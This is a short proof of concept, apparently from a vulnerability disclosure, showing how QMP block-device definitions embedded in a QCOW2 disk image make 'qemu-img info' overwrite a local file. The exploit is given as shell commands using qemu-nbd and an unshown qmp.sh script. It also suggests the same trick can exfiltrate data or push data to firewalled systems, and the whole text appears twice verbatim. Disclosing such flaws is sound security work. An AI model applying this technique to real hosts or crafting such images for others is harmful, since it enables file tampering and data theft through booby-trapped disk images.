There is an obscure feature to embed QMP definitions for block devices into disk images. This does work for backing and data files in the QCOW2 format as well for extents in VMDK. So here is a proof of concept that overwrites a local file:
# prepare two files with random content
truncate -s 1M file-1.raw && dd if=/dev/random of=file-1.raw bs=64 count=1 conv=notrunc
truncate -s 1M file-2.raw && dd if=/dev/random of=file-2.raw bs=64 count=1 conv=notrunc
# serve the second file via NBD
qemu-nbd -p 1234 -f raw -x "data" -v -t -T 'nbd*' file-2.raw
# prepare the disk image
./qmp.sh
# ... and overwrite the first 112 bytes in file-1
qemu-img info disk.qcow2
Swap child1 and child2 to exfiltrate data or use the snapshot-access to deliver data to firewalled systems.
There is an obscure feature to embed QMP definitions for block devices into disk images. This does work for backing and data files in the QCOW2 format as well for extents in VMDK. So here is a proof of concept that overwrites a local file:
# prepare two files with random content
truncate -s 1M file-1.raw && dd if=/dev/random of=file-1.raw bs=64 count=1 conv=notrunc
truncate -s 1M file-2.raw && dd if=/dev/random of=file-2.raw bs=64 count=1 conv=notrunc
# serve the second file via NBD
qemu-nbd -p 1234 -f raw -x "data" -v -t -T 'nbd*' file-2.raw
# prepare the disk image
./qmp.sh
# ... and overwrite the first 112 bytes in file-1
qemu-img info disk.qcow2
Swap child1 and child2 to exfiltrate data or use the snapshot-access to deliver data to firewalled systems.